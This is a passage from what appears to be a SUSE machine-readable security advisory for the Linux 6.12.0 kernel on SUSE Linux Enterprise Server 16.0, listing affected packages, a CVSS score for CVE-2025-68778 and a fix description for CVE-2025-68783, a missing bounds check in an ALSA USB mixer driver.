"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68778"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
